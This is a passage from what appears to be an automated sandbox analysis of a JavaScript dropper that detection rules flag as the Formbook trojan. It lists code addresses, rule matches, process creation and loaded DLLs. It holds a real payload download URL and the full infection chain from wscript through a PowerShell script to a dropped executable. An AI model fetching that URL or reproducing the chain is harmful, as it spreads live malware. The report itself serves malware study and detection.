          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004161E34_2_004161E3
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004021884_2_00402188
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004021904_2_00402190
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0040FB134_2_0040FB13
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0040DB934_2_0040DB93
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00402D754_2_00402D75
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004025104_2_00402510
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0042E5134_2_0042E513
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00402D804_2_00402D80
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A501AA4_2_01A501AA
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199B1B04_2_0199B1B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A481CC4_2_01A481CC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019801004_2_01980100
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2A1184_2_01A2A118
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A5B16B4_2_01A5B16B
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197F1724_2_0197F172
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019C516C4_2_019C516C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A181584_2_01A18158
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4F0E04_2_01A4F0E0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A470E94_2_01A470E9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019970C04_2_019970C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3F0CC4_2_01A3F0CC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019D739A4_2_019D739A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A503E64_2_01A503E6
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199E3F04_2_0199E3F0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4132D4_2_01A4132D
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0197D34C4_2_0197D34C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4A3524_2_01A4A352
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019952A04_2_019952A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A312ED4_2_01A312ED
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AB2C04_2_019AB2C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A302744_2_01A30274
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2D5B04_2_01A2D5B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A505914_2_01A50591
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019905354_2_01990535
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A475714_2_01A47571
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3E4F64_2_01A3E4F6
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4F43F4_2_01A4F43F
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A424464_2_01A42446
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019814604_2_01981460
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4F7B04_2_01A4F7B0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198C7C04_2_0198C7C0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B47504_2_019B4750
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019907704_2_01990770
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A416CC4_2_01A416CC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AC6E04_2_019AC6E0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A5A9A64_2_01A5A9A6
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019929A04_2_019929A0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019999504_2_01999950
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AB9504_2_019AB950
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A69624_2_019A6962
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019768B84_2_019768B8
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019BE8F04_2_019BE8F0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019938E04_2_019938E0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019FD8004_2_019FD800
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019928404_2_01992840
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199A8404_2_0199A840
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AFB804_2_019AFB80
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A05BF04_2_01A05BF0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019CDBF94_2_019CDBF9
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A46BD74_2_01A46BD7
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4FB764_2_01A4FB76
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4AB404_2_01A4AB40
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A2DAAC4_2_01A2DAAC
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198EA804_2_0198EA80
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019D5AA04_2_019D5AA0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A3DAC64_2_01A3DAC6
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A03A6C4_2_01A03A6C
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A47A464_2_01A47A46
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4FA494_2_01A4FA49
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A8DBF4_2_019A8DBF
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019AFDC04_2_019AFDC0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0198ADE04_2_0198ADE0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0199AD004_2_0199AD00
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A47D734_2_01A47D73
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01993D404_2_01993D40
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A41D5A4_2_01A41D5A
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A30CB54_2_01A30CB5
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4FCF24_2_01A4FCF2
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01980CF24_2_01980CF2
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A09C324_2_01A09C32
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01990C004_2_01990C00
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01991F924_2_01991F92
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4FFB14_2_01A4FFB1
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01982FC84_2_01982FC8
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019B0F304_2_019B0F30
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4FF094_2_01A4FF09
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019D2F284_2_019D2F28
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A04F404_2_01A04F40
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_019A2E904_2_019A2E90
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01999EB04_2_01999EB0
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4CE934_2_01A4CE93
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4EEDB4_2_01A4EEDB
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01A4EE264_2_01A4EE26
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_01990E594_2_01990E59
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 0197B970 appears 253 times
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 019D7E54 appears 89 times
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 019FEA12 appears 86 times
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 019C5130 appears 36 times
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: String function: 01A0F290 appears 105 times
          Source: TT copy.jsInitial sample: Strings found which are bigger than 50
          Source: 4.2.x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.1951239959.00000000017F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.1950225873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: powershell.exe PID: 6896, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal100.troj.expl.evad.winJS@8/7@1/1
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ugok5m[1].ps1Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
          Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\dddddd.ps1Jump to behavior
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT copy.js"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: FREAKY.pdb source: x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1863261944.0000000005580000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: VCJSKS.pdb source: x.exe, 00000003.00000000.1775660603.0000000000AF2000.00000002.00000001.01000000.00000008.sdmp, x.exe.1.dr
          Source: Binary string: FREAKY.pdb(~>~ 0~_CorDllMainmscoree.dll source: x.exe, 00000003.00000002.1842412077.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000003.00000002.1863261944.0000000005580000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: x.exe, 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: x.exe, x.exe, 00000004.00000002.1951601396.0000000001950000.00000040.00001000.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:19 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:26 o:Windows%20Script%20Host f:CreateObject a0:%22Scripting.FileSystemObject%22");IHost.CreateObject("Scripting.FileSystemObject");IHost.Name();IFileSystem3._00000000();ITextStream.WriteLine(" exit:26 o:Windows%20Script%20Host f:CreateObject r:");IHost.Name();ITextStream.WriteLine(" entry:33 o:Windows%20Script%20Host f:CreateObject a0:%22MSXML2.XMLHTTP%22");IHost.CreateObject("MSXML2.XMLHTTP");IHost.Name();IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:33 o:Windows%20Script%20Host f:CreateObject r:");IFileSystem3._00000000();ITextStream.WriteLine(" entry:42 o: f:FolderExists a0:%22C%3A%5CTemp%22");IFileSystem3.FolderExists("C:\Temp");IFileSystem3._00000000();ITextStream.WriteLine(" exit:42 o: f:FolderExists r:false");IFileSystem3._00000000();ITextStream.WriteLine(" entry:50 o: f:CreateFolder a0:%22C%3A%5CTemp%22");IFileSystem3.CreateFolder("C:\Temp");IFileSystem3._00000000();IFolder.Path();ITextStream.WriteLine(" exit:50 o: f:CreateFolder r:C%3A%5CTemp");ITextStream.WriteLine(" entry:181 f:DownloadScript a0:%22https%3A%2F%2Ffiles.catbox.moe%2Fugok5m.ps1%22 